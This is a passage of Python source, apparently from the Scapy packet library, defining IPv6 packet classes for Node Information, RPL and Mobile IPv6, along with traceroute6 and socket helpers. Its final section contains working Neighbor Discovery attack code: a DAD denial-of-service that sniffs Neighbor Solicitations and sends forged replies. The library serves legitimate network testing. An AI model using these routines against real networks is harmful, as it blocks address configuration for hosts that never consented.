2771 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
2772 code = 1
2773
2774
2775class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
2776 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
2777 code = 2
2778
2779
2780def _niquery_guesser(p):
2781 cls = conf.raw_layer
2782 type = orb(p[0])
2783 if type == 139: # Node Info Query specific stuff
2784 if len(p) > 6:
2785 qtype, = struct.unpack("!H", p[4:6])
2786 cls = {0: ICMPv6NIQueryNOOP,
2787 2: ICMPv6NIQueryName,
2788 3: ICMPv6NIQueryIPv6,
2789 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
2790 elif type == 140: # Node Info Reply specific stuff
2791 code = orb(p[1])
2792 if code == 0:
2793 if len(p) > 6:
2794 qtype, = struct.unpack("!H", p[4:6])
2795 cls = {2: ICMPv6NIReplyName,
2796 3: ICMPv6NIReplyIPv6,
2797 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
2798 elif code == 1:
2799 cls = ICMPv6NIReplyRefuse
2800 elif code == 2:
2801 cls = ICMPv6NIReplyUnknown
2802 return cls
2803
2804
2805#############################################################################
2806#############################################################################
2807# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
2808#############################################################################
2809#############################################################################
2810
2811# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
2812rplcodes = {0: "DIS",
2813 1: "DIO",
2814 2: "DAO",
2815 3: "DAO-ACK",
2816 # 4: "P2P-DRO",
2817 # 5: "P2P-DRO-ACK",
2818 # 6: "Measurement",
2819 7: "DCO",
2820 8: "DCO-ACK"}
2821
2822
2823class ICMPv6RPL(_ICMPv6): # RFC 6550
2824 name = 'RPL'
2825 fields_desc = [ByteEnumField("type", 155, icmp6types),
2826 ByteEnumField("code", 0, rplcodes),
2827 XShortField("cksum", None)]
2828 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2829
2830
2831#############################################################################
2832#############################################################################
2833# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
2834#############################################################################
2835#############################################################################
2836
2837# Mobile IPv6 ICMPv6 related classes
2838
2839class ICMPv6HAADRequest(_ICMPv6):
2840 name = 'ICMPv6 Home Agent Address Discovery Request'
2841 fields_desc = [ByteEnumField("type", 144, icmp6types),
2842 ByteField("code", 0),
2843 XShortField("cksum", None),
2844 XShortField("id", None),
2845 BitEnumField("R", 1, 1, {1: 'MR'}),
2846 XBitField("res", 0, 15)]
2847
2848 def hashret(self):
2849 return struct.pack("!H", self.id) + self.payload.hashret()
2850
2851
2852class ICMPv6HAADReply(_ICMPv6):
2853 name = 'ICMPv6 Home Agent Address Discovery Reply'
2854 fields_desc = [ByteEnumField("type", 145, icmp6types),
2855 ByteField("code", 0),
2856 XShortField("cksum", None),
2857 XShortField("id", None),
2858 BitEnumField("R", 1, 1, {1: 'MR'}),
2859 XBitField("res", 0, 15),
2860 IP6ListField('addresses', None)]
2861
2862 def hashret(self):
2863 return struct.pack("!H", self.id) + self.payload.hashret()
2864
2865 def answers(self, other):
2866 if not isinstance(other, ICMPv6HAADRequest):
2867 return 0
2868 return self.id == other.id
2869
2870
2871class ICMPv6MPSol(_ICMPv6):
2872 name = 'ICMPv6 Mobile Prefix Solicitation'
2873 fields_desc = [ByteEnumField("type", 146, icmp6types),
2874 ByteField("code", 0),
2875 XShortField("cksum", None),
2876 XShortField("id", None),
2877 XShortField("res", 0)]
2878
2879 def _hashret(self):
2880 return struct.pack("!H", self.id)
2881
2882
2883class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2884 name = 'ICMPv6 Mobile Prefix Advertisement'
2885 fields_desc = [ByteEnumField("type", 147, icmp6types),
2886 ByteField("code", 0),
2887 XShortField("cksum", None),
2888 XShortField("id", None),
2889 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
2890 XBitField("res", 0, 14)]
2891
2892 def hashret(self):
2893 return struct.pack("!H", self.id)
2894
2895 def answers(self, other):
2896 return isinstance(other, ICMPv6MPSol)
2897
2898# Mobile IPv6 Options classes
2899
2900
2901_mobopttypes = {2: "Binding Refresh Advice",
2902 3: "Alternate Care-of Address",
2903 4: "Nonce Indices",
2904 5: "Binding Authorization Data",
2905 6: "Mobile Network Prefix (RFC3963)",
2906 7: "Link-Layer Address (RFC4068)",
2907 8: "Mobile Node Identifier (RFC4283)",
2908 9: "Mobility Message Authentication (RFC4285)",
2909 10: "Replay Protection (RFC4285)",
2910 11: "CGA Parameters Request (RFC4866)",
2911 12: "CGA Parameters (RFC4866)",
2912 13: "Signature (RFC4866)",
2913 14: "Home Keygen Token (RFC4866)",
2914 15: "Care-of Test Init (RFC4866)",
2915 16: "Care-of Test (RFC4866)"}
2916
2917
2918class _MIP6OptAlign(Packet):
2919 """ Mobile IPv6 options have alignment requirements of the form x*n+y.
2920 This class is inherited by all MIPv6 options to help in computing the
2921 required Padding for that option, i.e. the need for a Pad1 or PadN
2922 option before it. They only need to provide x and y as class
2923 parameters. (x=0 and y=0 are used when no alignment is required)"""
2924
2925 __slots__ = ["x", "y"]
2926
2927 def alignment_delta(self, curpos):
2928 x = self.x
2929 y = self.y
2930 if x == 0 and y == 0:
2931 return 0
2932 delta = x * ((curpos - y + x - 1) // x) + y - curpos
2933 return delta
2934
2935 def extract_padding(self, p):
2936 return b"", p
2937
2938
2939class MIP6OptBRAdvice(_MIP6OptAlign):
2940 name = 'Mobile IPv6 Option - Binding Refresh Advice'
2941 fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
2942 ByteField('olen', 2),
2943 ShortField('rinter', 0)]
2944 x = 2
2945 y = 0 # alignment requirement: 2n
2946
2947
2948class MIP6OptAltCoA(_MIP6OptAlign):
2949 name = 'MIPv6 Option - Alternate Care-of Address'
2950 fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
2951 ByteField('olen', 16),
2952 IP6Field("acoa", "::")]
2953 x = 8
2954 y = 6 # alignment requirement: 8n+6
2955
2956
2957class MIP6OptNonceIndices(_MIP6OptAlign):
2958 name = 'MIPv6 Option - Nonce Indices'
2959 fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
2960 ByteField('olen', 16),
2961 ShortField('hni', 0),
2962 ShortField('coni', 0)]
2963 x = 2
2964 y = 0 # alignment requirement: 2n
2965
2966
2967class MIP6OptBindingAuthData(_MIP6OptAlign):
2968 name = 'MIPv6 Option - Binding Authorization Data'
2969 fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
2970 ByteField('olen', 16),
2971 BitField('authenticator', 0, 96)]
2972 x = 8
2973 y = 2 # alignment requirement: 8n+2
2974
2975
2976class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963
2977 name = 'NEMO Option - Mobile Network Prefix'
2978 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
2979 ByteField("olen", 18),
2980 ByteField("reserved", 0),
2981 ByteField("plen", 64),
2982 IP6Field("prefix", "::")]
2983 x = 8
2984 y = 4 # alignment requirement: 8n+4
2985
2986
2987class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068
2988 name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
2989 fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
2990 ByteField("olen", 7),
2991 ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
2992 ByteField("pad", 0),
2993 MACField("lla", ETHER_ANY)] # Only support ethernet
2994 x = 0
2995 y = 0 # alignment requirement: none
2996
2997
2998class MIP6OptMNID(_MIP6OptAlign): # RFC 4283
2999 name = "MIPv6 Option - Mobile Node Identifier"
3000 fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
3001 FieldLenField("olen", None, length_of="id", fmt="B",
3002 adjust=lambda pkt, x: x + 1),
3003 ByteEnumField("subtype", 1, {1: "NAI"}),
3004 StrLenField("id", "",
3005 length_from=lambda pkt: pkt.olen - 1)]
3006 x = 0
3007 y = 0 # alignment requirement: none
3008
3009# We only support decoding and basic build. Automatic HMAC computation is
3010# too much work for our current needs. It is left to the user (I mean ...
3011# you). --arno
3012
3013
3014class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5)
3015 name = "MIPv6 Option - Mobility Message Authentication"
3016 fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
3017 FieldLenField("olen", None, length_of="authdata", fmt="B",
3018 adjust=lambda pkt, x: x + 5),
3019 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501
3020 2: "MN-AAA authentication mobility option"}), # noqa: E501
3021 IntField("mspi", None),
3022 StrLenField("authdata", "A" * 12,
3023 length_from=lambda pkt: pkt.olen - 5)]
3024 x = 4
3025 y = 1 # alignment requirement: 4n+1
3026
3027# Extracted from RFC 1305 (NTP) :
3028# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3029# in seconds relative to 0h on 1 January 1900. The integer part is in the
3030# first 32 bits and the fraction part in the last 32 bits.
3031
3032
3033class NTPTimestampField(LongField):
3034 def i2repr(self, pkt, x):
3035 if x < ((50 * 31536000) << 32):
3036 return "Some date a few decades ago (%d)" % x
3037
3038 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
3039 # January 1st 1970 :
3040 delta = -2209075761
3041 i = int(x >> 32)
3042 j = float(x & 0xffffffff) * 2.0**-32
3043 res = i + j + delta
3044 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
3045
3046 return "%s (%d)" % (t, x)
3047
3048
3049class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6)
3050 name = "MIPv6 option - Replay Protection"
3051 fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
3052 ByteField("olen", 8),
3053 NTPTimestampField("timestamp", 0)]
3054 x = 8
3055 y = 2 # alignment requirement: 8n+2
3056
3057
3058class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6)
3059 name = "MIPv6 option - CGA Parameters Request"
3060 fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
3061 ByteField("olen", 0)]
3062 x = 0
3063 y = 0 # alignment requirement: none
3064
3065# XXX TODO: deal with CGA param fragmentation and build of defragmented
3066# XXX version. Passing of a big CGAParam structure should be
3067# XXX simplified. Make it hold packets, by the way --arno
3068
3069
3070class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1)
3071 name = "MIPv6 option - CGA Parameters"
3072 fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
3073 FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
3074 StrLenField("cgaparams", "",
3075 length_from=lambda pkt: pkt.olen)]
3076 x = 0
3077 y = 0 # alignment requirement: none
3078
3079
3080class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2)
3081 name = "MIPv6 option - Signature"
3082 fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
3083 FieldLenField("olen", None, length_of="sig", fmt="B"),
3084 StrLenField("sig", "",
3085 length_from=lambda pkt: pkt.olen)]
3086 x = 0
3087 y = 0 # alignment requirement: none
3088
3089
3090class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3)
3091 name = "MIPv6 option - Home Keygen Token"
3092 fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
3093 FieldLenField("olen", None, length_of="hkt", fmt="B"),
3094 StrLenField("hkt", "",
3095 length_from=lambda pkt: pkt.olen)]
3096 x = 0
3097 y = 0 # alignment requirement: none
3098
3099
3100class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4)
3101 name = "MIPv6 option - Care-of Test Init"
3102 fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
3103 ByteField("olen", 0)]
3104 x = 0
3105 y = 0 # alignment requirement: none
3106
3107
3108class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5)
3109 name = "MIPv6 option - Care-of Test"
3110 fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
3111 FieldLenField("olen", None, length_of="cokt", fmt="B"),
3112 StrLenField("cokt", b'\x00' * 8,
3113 length_from=lambda pkt: pkt.olen)]
3114 x = 0
3115 y = 0 # alignment requirement: none
3116
3117
3118class MIP6OptUnknown(_MIP6OptAlign):
3119 name = 'Scapy6 - Unknown Mobility Option'
3120 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
3121 FieldLenField("olen", None, length_of="odata", fmt="B"),
3122 StrLenField("odata", "",
3123 length_from=lambda pkt: pkt.olen)]
3124 x = 0
3125 y = 0 # alignment requirement: none
3126
3127 @classmethod
3128 def dispatch_hook(cls, _pkt=None, *_, **kargs):
3129 if _pkt:
3130 o = orb(_pkt[0]) # Option type
3131 if o in moboptcls:
3132 return moboptcls[o]
3133 return cls
3134
3135
3136moboptcls = {0: Pad1,
3137 1: PadN,
3138 2: MIP6OptBRAdvice,
3139 3: MIP6OptAltCoA,
3140 4: MIP6OptNonceIndices,
3141 5: MIP6OptBindingAuthData,
3142 6: MIP6OptMobNetPrefix,
3143 7: MIP6OptLLAddr,
3144 8: MIP6OptMNID,
3145 9: MIP6OptMsgAuth,
3146 10: MIP6OptReplayProtection,
3147 11: MIP6OptCGAParamsReq,
3148 12: MIP6OptCGAParams,
3149 13: MIP6OptSignature,
3150 14: MIP6OptHomeKeygenToken,
3151 15: MIP6OptCareOfTestInit,
3152 16: MIP6OptCareOfTest}
3153
3154
3155# Main Mobile IPv6 Classes
3156
3157mhtypes = {0: 'BRR',
3158 1: 'HoTI',
3159 2: 'CoTI',
3160 3: 'HoT',
3161 4: 'CoT',
3162 5: 'BU',
3163 6: 'BA',
3164 7: 'BE',
3165 8: 'Fast BU',
3166 9: 'Fast BA',
3167 10: 'Fast NA'}
3168
3169# From http://www.iana.org/assignments/mobility-parameters
3170bastatus = {0: 'Binding Update accepted',
3171 1: 'Accepted but prefix discovery necessary',
3172 128: 'Reason unspecified',
3173 129: 'Administratively prohibited',
3174 130: 'Insufficient resources',
3175 131: 'Home registration not supported',
3176 132: 'Not home subnet',
3177 133: 'Not home agent for this mobile node',
3178 134: 'Duplicate Address Detection failed',
3179 135: 'Sequence number out of window',
3180 136: 'Expired home nonce index',
3181 137: 'Expired care-of nonce index',
3182 138: 'Expired nonces',
3183 139: 'Registration type change disallowed',
3184 140: 'Mobile Router Operation not permitted',
3185 141: 'Invalid Prefix',
3186 142: 'Not Authorized for Prefix',
3187 143: 'Forwarding Setup failed (prefixes missing)',
3188 144: 'MIPV6-ID-MISMATCH',
3189 145: 'MIPV6-MESG-ID-REQD',
3190 146: 'MIPV6-AUTH-FAIL',
3191 147: 'Permanent home keygen token unavailable',
3192 148: 'CGA and signature verification failed',
3193 149: 'Permanent home keygen token exists',
3194 150: 'Non-null home nonce index expected'}
3195
3196
3197class _MobilityHeader(Packet):
3198 name = 'Dummy IPv6 Mobility Header'
3199 overload_fields = {IPv6: {"nh": 135}}
3200
3201 def post_build(self, p, pay):
3202 p += pay
3203 tmp_len = self.len
3204 if self.len is None:
3205 tmp_len = (len(p) - 8) // 8
3206 p = p[:1] + struct.pack("B", tmp_len) + p[2:]
3207 if self.cksum is None:
3208 cksum = in6_chksum(135, self.underlayer, p)
3209 else:
3210 cksum = self.cksum
3211 p = p[:4] + struct.pack("!H", cksum) + p[6:]
3212 return p
3213
3214
3215class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
3216 name = "IPv6 Mobility Header - Generic Message"
3217 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3218 ByteField("len", None),
3219 ByteEnumField("mhtype", None, mhtypes),
3220 ByteField("res", None),
3221 XShortField("cksum", None),
3222 StrLenField("msg", b"\x00" * 2,
3223 length_from=lambda pkt: 8 * pkt.len - 6)]
3224
3225
3226class MIP6MH_BRR(_MobilityHeader):
3227 name = "IPv6 Mobility Header - Binding Refresh Request"
3228 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3229 ByteField("len", None),
3230 ByteEnumField("mhtype", 0, mhtypes),
3231 ByteField("res", None),
3232 XShortField("cksum", None),
3233 ShortField("res2", None),
3234 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3235 _OptionsField("options", [], MIP6OptUnknown, 8,
3236 length_from=lambda pkt: 8 * pkt.len)]
3237 overload_fields = {IPv6: {"nh": 135}}
3238
3239 def hashret(self):
3240 # Hack: BRR, BU and BA have the same hashret that returns the same
3241 # value b"\x00\x08\x09" (concatenation of mhtypes). This is
3242 # because we need match BA with BU and BU with BRR. --arno
3243 return b"\x00\x08\x09"
3244
3245
3246class MIP6MH_HoTI(_MobilityHeader):
3247 name = "IPv6 Mobility Header - Home Test Init"
3248 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3249 ByteField("len", None),
3250 ByteEnumField("mhtype", 1, mhtypes),
3251 ByteField("res", None),
3252 XShortField("cksum", None),
3253 StrFixedLenField("reserved", b"\x00" * 2, 2),
3254 StrFixedLenField("cookie", b"\x00" * 8, 8),
3255 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3256 _OptionsField("options", [], MIP6OptUnknown, 16,
3257 length_from=lambda pkt: 8 * (pkt.len - 1))]
3258 overload_fields = {IPv6: {"nh": 135}}
3259
3260 def hashret(self):
3261 return bytes_encode(self.cookie)
3262
3263
3264class MIP6MH_CoTI(MIP6MH_HoTI):
3265 name = "IPv6 Mobility Header - Care-of Test Init"
3266 mhtype = 2
3267
3268 def hashret(self):
3269 return bytes_encode(self.cookie)
3270
3271
3272class MIP6MH_HoT(_MobilityHeader):
3273 name = "IPv6 Mobility Header - Home Test"
3274 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3275 ByteField("len", None),
3276 ByteEnumField("mhtype", 3, mhtypes),
3277 ByteField("res", None),
3278 XShortField("cksum", None),
3279 ShortField("index", None),
3280 StrFixedLenField("cookie", b"\x00" * 8, 8),
3281 StrFixedLenField("token", b"\x00" * 8, 8),
3282 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3283 _OptionsField("options", [], MIP6OptUnknown, 24,
3284 length_from=lambda pkt: 8 * (pkt.len - 2))]
3285 overload_fields = {IPv6: {"nh": 135}}
3286
3287 def hashret(self):
3288 return bytes_encode(self.cookie)
3289
3290 def answers(self, other):
3291 if (isinstance(other, MIP6MH_HoTI) and
3292 self.cookie == other.cookie):
3293 return 1
3294 return 0
3295
3296
3297class MIP6MH_CoT(MIP6MH_HoT):
3298 name = "IPv6 Mobility Header - Care-of Test"
3299 mhtype = 4
3300
3301 def hashret(self):
3302 return bytes_encode(self.cookie)
3303
3304 def answers(self, other):
3305 if (isinstance(other, MIP6MH_CoTI) and
3306 self.cookie == other.cookie):
3307 return 1
3308 return 0
3309
3310
3311class LifetimeField(ShortField):
3312 def i2repr(self, pkt, x):
3313 return "%d sec" % (4 * x)
3314
3315
3316class MIP6MH_BU(_MobilityHeader):
3317 name = "IPv6 Mobility Header - Binding Update"
3318 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3319 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3320 ByteEnumField("mhtype", 5, mhtypes),
3321 ByteField("res", None),
3322 XShortField("cksum", None),
3323 XShortField("seq", None), # TODO: ShortNonceField
3324 FlagsField("flags", "KHA", 7, "PRMKLHA"),
3325 XBitField("reserved", 0, 9),
3326 LifetimeField("mhtime", 3), # unit == 4 seconds
3327 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3328 _OptionsField("options", [], MIP6OptUnknown, 12,
3329 length_from=lambda pkt: 8 * pkt.len - 4)]
3330 overload_fields = {IPv6: {"nh": 135}}
3331
3332 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3333 return b"\x00\x08\x09"
3334
3335 def answers(self, other):
3336 if isinstance(other, MIP6MH_BRR):
3337 return 1
3338 return 0
3339
3340
3341class MIP6MH_BA(_MobilityHeader):
3342 name = "IPv6 Mobility Header - Binding ACK"
3343 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3344 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3345 ByteEnumField("mhtype", 6, mhtypes),
3346 ByteField("res", None),
3347 XShortField("cksum", None),
3348 ByteEnumField("status", 0, bastatus),
3349 FlagsField("flags", "K", 3, "PRK"),
3350 XBitField("res2", None, 5),
3351 XShortField("seq", None), # TODO: ShortNonceField
3352 XShortField("mhtime", 0), # unit == 4 seconds
3353 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3354 _OptionsField("options", [], MIP6OptUnknown, 12,
3355 length_from=lambda pkt: 8 * pkt.len - 4)]
3356 overload_fields = {IPv6: {"nh": 135}}
3357
3358 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3359 return b"\x00\x08\x09"
3360
3361 def answers(self, other):
3362 if (isinstance(other, MIP6MH_BU) and
3363 other.mhtype == 5 and
3364 self.mhtype == 6 and
3365 other.flags & 0x1 and # Ack request flags is set
3366 self.seq == other.seq):
3367 return 1
3368 return 0
3369
3370
3371_bestatus = {1: 'Unknown binding for Home Address destination option',
3372 2: 'Unrecognized MH Type value'}
3373
3374# TODO: match Binding Error to its stimulus
3375
3376
3377class MIP6MH_BE(_MobilityHeader):
3378 name = "IPv6 Mobility Header - Binding Error"
3379 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3380 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3381 ByteEnumField("mhtype", 7, mhtypes),
3382 ByteField("res", 0),
3383 XShortField("cksum", None),
3384 ByteEnumField("status", 0, _bestatus),
3385 ByteField("reserved", 0),
3386 IP6Field("ha", "::"),
3387 _OptionsField("options", [], MIP6OptUnknown, 24,
3388 length_from=lambda pkt: 8 * (pkt.len - 2))]
3389 overload_fields = {IPv6: {"nh": 135}}
3390
3391
3392_mip6_mhtype2cls = {0: MIP6MH_BRR,
3393 1: MIP6MH_HoTI,
3394 2: MIP6MH_CoTI,
3395 3: MIP6MH_HoT,
3396 4: MIP6MH_CoT,
3397 5: MIP6MH_BU,
3398 6: MIP6MH_BA,
3399 7: MIP6MH_BE}
3400
3401
3402#############################################################################
3403#############################################################################
3404# Traceroute6 #
3405#############################################################################
3406#############################################################################
3407
3408class AS_resolver6(AS_resolver_riswhois):
3409 def _resolve_one(self, ip):
3410 """
3411 overloaded version to provide a Whois resolution on the
3412 embedded IPv4 address if the address is 6to4 or Teredo.
3413 Otherwise, the native IPv6 address is passed.
3414 """
3415
3416 if in6_isaddr6to4(ip): # for 6to4, use embedded @
3417 tmp = inet_pton(socket.AF_INET6, ip)
3418 addr = inet_ntop(socket.AF_INET, tmp[2:6])
3419 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
3420 addr = teredoAddrExtractInfo(ip)[2]
3421 else:
3422 addr = ip
3423
3424 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
3425
3426 if asn.startswith("AS"):
3427 try:
3428 asn = int(asn[2:])
3429 except ValueError:
3430 pass
3431
3432 return ip, asn, desc
3433
3434
3435class TracerouteResult6(TracerouteResult):
3436 __slots__ = []
3437
3438 def show(self):
3439 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501
3440 s.hlim,
3441 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501
3442 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501
3443 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501
3444 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501
3445
3446 def get_trace(self):
3447 trace = {}
3448
3449 for s, r in self.res:
3450 if IPv6 not in s:
3451 continue
3452 d = s[IPv6].dst
3453 if d not in trace:
3454 trace[d] = {}
3455
3456 t = not (ICMPv6TimeExceeded in r or
3457 ICMPv6DestUnreach in r or
3458 ICMPv6PacketTooBig in r or
3459 ICMPv6ParamProblem in r)
3460
3461 trace[d][s[IPv6].hlim] = r[IPv6].src, t
3462
3463 for k in trace.values():
3464 try:
3465 m = min(x for x, y in k.items() if y[1])
3466 except ValueError:
3467 continue
3468 for li in list(k): # use list(): k is modified in the loop
3469 if li > m:
3470 del k[li]
3471
3472 return trace
3473
3474 def graph(self, ASres=AS_resolver6(), **kargs):
3475 TracerouteResult.graph(self, ASres=ASres, **kargs)
3476
3477
3478@conf.commands.register
3479def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
3480 l4=None, timeout=2, verbose=None, **kargs):
3481 """Instant TCP traceroute using IPv6
3482 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
3483 """
3484 if verbose is None:
3485 verbose = conf.verb
3486
3487 if l4 is None:
3488 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501
3489 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501
3490 else:
3491 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
3492 timeout=timeout, verbose=verbose, **kargs)
3493
3494 a = TracerouteResult6(a.res)
3495
3496 if verbose:
3497 a.show()
3498
3499 return a, b
3500
3501#############################################################################
3502#############################################################################
3503# Sockets #
3504#############################################################################
3505#############################################################################
3506
3507
3508if not WINDOWS:
3509 from scapy.supersocket import L3RawSocket
3510
3511 class L3RawSocket6(L3RawSocket):
3512 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501
3513 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501
3514 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501
3515 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501
3516 self.iface = iface
3517
3518
3519def IPv6inIP(dst='203.178.135.36', src=None):
3520 _IPv6inIP.dst = dst
3521 _IPv6inIP.src = src
3522 if not conf.L3socket == _IPv6inIP:
3523 _IPv6inIP.cls = conf.L3socket
3524 else:
3525 del conf.L3socket
3526 return _IPv6inIP
3527
3528
3529class _IPv6inIP(SuperSocket):
3530 dst = '127.0.0.1'
3531 src = None
3532 cls = None
3533
3534 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501
3535 SuperSocket.__init__(self, family, type, proto)
3536 self.worker = self.cls(**args)
3537
3538 def set(self, dst, src=None):
3539 _IPv6inIP.src = src
3540 _IPv6inIP.dst = dst
3541
3542 def nonblock_recv(self):
3543 p = self.worker.nonblock_recv()
3544 return self._recv(p)
3545
3546 def recv(self, x):
3547 p = self.worker.recv(x)
3548 return self._recv(p, x)
3549
3550 def _recv(self, p, x=MTU):
3551 if p is None:
3552 return p
3553 elif isinstance(p, IP):
3554 # TODO: verify checksum
3555 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
3556 if isinstance(p.payload, IPv6):
3557 return p.payload
3558 return p
3559
3560 def send(self, x):
3561 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501
3562
3563
3564#############################################################################
3565#############################################################################
3566# Neighbor Discovery Protocol Attacks #
3567#############################################################################
3568#############################################################################
3569
3570def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
3571 tgt_filter=None, reply_mac=None):
3572 """
3573 Internal generic helper accepting a specific callback as first argument,
3574 for NS or NA reply. See the two specific functions below.
3575 """
3576
3577 def is_request(req, mac_src_filter, tgt_filter):
3578 """
3579 Check if packet req is a request
3580 """
3581
3582 # Those simple checks are based on Section 5.4.2 of RFC 4862
3583 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3584 return 0
3585
3586 # Get and compare the MAC address
3587 mac_src = req[Ether].src
3588 if mac_src_filter and mac_src != mac_src_filter:
3589 return 0
3590
3591 # Source must be the unspecified address
3592 if req[IPv6].src != "::":
3593 return 0
3594
3595 # Check destination is the link-local solicited-node multicast
3596 # address associated with target address in received NS
3597 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3598 if tgt_filter and tgt != tgt_filter:
3599 return 0
3600 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
3601 expected_snma = in6_getnsma(tgt)
3602 if received_snma != expected_snma:
3603 return 0
3604
3605 return 1
3606
3607 if not iface:
3608 iface = conf.iface
3609
3610 # To prevent sniffing our own traffic
3611 if not reply_mac:
3612 reply_mac = get_if_hwaddr(iface)
3613 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3614
3615 sniff(store=0,
3616 filter=sniff_filter,
3617 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3618 prn=lambda x: reply_callback(x, reply_mac, iface),
3619 iface=iface)
3620
3621
3622def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
3623 reply_mac=None):
3624 """
3625 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3626 3756. This is done by listening incoming NS messages sent from the
3627 unspecified address and sending a NS reply for the target address,
3628 leading the peer to believe that another node is also performing DAD
3629 for that address.
3630
3631 By default, the fake NS sent to create the DoS uses:
3632 - as target address the target address found in received NS.
3633 - as IPv6 source address: the unspecified address (::).
3634 - as IPv6 destination address: the link-local solicited-node multicast
3635 address derived from the target address in received NS.
3636 - the mac address of the interface as source (or reply_mac, see below).
